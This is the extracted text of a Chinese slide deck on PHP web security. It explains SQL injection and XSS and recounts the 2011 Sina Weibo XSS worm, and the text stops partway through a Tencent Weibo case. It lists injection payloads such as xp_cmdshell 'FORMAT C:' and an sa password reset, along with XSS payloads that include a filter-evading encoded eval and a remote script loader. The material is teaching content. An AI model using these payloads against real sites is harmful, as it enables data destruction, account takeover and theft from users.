PHP安全相关.pptVIP

* PHP安全相关 分享概要 网站常见安全漏洞 漏洞的演示 对开发的指导意义 网站常见安全漏洞 一、SQL注入 定义：通过提交精心构造的表单数据，达到非法目的 本质：对用户提交的任何数据，过滤和验证的不充分 危害： --篡改系统数据（新增、删除、修改、收集）：alter login sa with password=‘123456’ --用户隐私外泄：select * from users --系统细节外泄：select * from sys.tables --控制操作系统：xp_cmdshell net stop iisadmin等shell命令 --损害硬盘：xp_cmdshell FORMAT C: --埋入其他漏洞：insert into comment(cnt) values(‘script…/script’) --污染原有关联数据：update sub_order set order_code = xxx where ... 发现注入漏洞后黑客一般会 盗取数据表中的数据，例如个人机密数据（信用卡，身份证，手机号，通讯录……），帐户数据，密码等，获得用户的数据和信息后对这些用户进行“社会工程学”活动。 取得系统管理员权限（例如ALTER LOGIN sa WITH PASSWORD=’xxxxxx’）。 在数据库中的数据中插入一些HTML/JS代码，有可能得以在网页加入恶意链接以及XSS，这样一来就让访问者被黑。 经由数据库服务器提供的操作系统支持，让黑客得以修改或控制操作系统（例如：MS SQL Server的 xp_cmdshell “net stop iisadmin”可停止服务器的IIS服务）。甚至破坏硬盘数据，瘫痪全系统（例如xp_cmdshell “FORMAT C:”） SQL注入的社会工程手段 二、XSS(跨站脚本攻击) 定义：跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的 本质：对用户提交的任何数据，过滤和验证的不充分 危害： --用户个人信息被劫持利用：受害者被当做中间人利用 --用户个人资产被利用：在网站中注入广告代码、挂蠕虫、病毒、木马 --帮助CSRF，绕过CSFR的token验证 --盗取用户的cookie/referer/IP等 XSS样例代码 img scr=1 onerror=alert(xss)当找不到图片名为1的文件时，执行alert(xss) a href=javascript:alert(xss)s/a 点击s时运行alert(xss) iframe src=javascript:alert(xss);height=0 width=0 /iframe利用iframe的scr来弹窗 img src=1 onerror=eval(\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29)/img过滤了alert来执行弹窗 img src=x onerror=appendChild(createElement(script)).src=js_url / XSS案例：新浪微博的XSS攻击 今天晚上（2011年6月28日），新浪微博出现了一次比较大的XSS攻击事件。大量用户自动发送诸如：“郭美美事件的一些未注意到的细节”，“建党大业中穿帮的地方”，“让女人心动的100句诗歌”，“3D肉团团高清普通话版种子”，“这是传说中的神仙眷侣啊”，“惊爆!范冰冰艳照真流出了”等等微博和私信，并自动关注一位名为hellosamy的用户。 事件的经过线索如下： XSS案例：新浪微博的XSS攻击 20:14，开始有大量带V的认证用户中招转发蠕虫 20:30，2中的病毒页面无法访问 20:32，新浪微博中hellosamy用户无法访问 21:02，新浪漏洞修补完毕 XSS案例：腾讯微博的XSS攻击 腾讯微博的应用介绍地址基本都是这样的： /app/intro/xxxxxxxxx 比如这个不知是什么虾米的“test9“应用的介绍地址是这样的： /app/intro/24042/test9/http%253A%252F%252F%252Fcgi-bin%252Fwbapps%252Fwb_appstore_app.cgi%253Fappid%253D24042 看到后面的“http%253A%252F%252F%252Fcgi-bin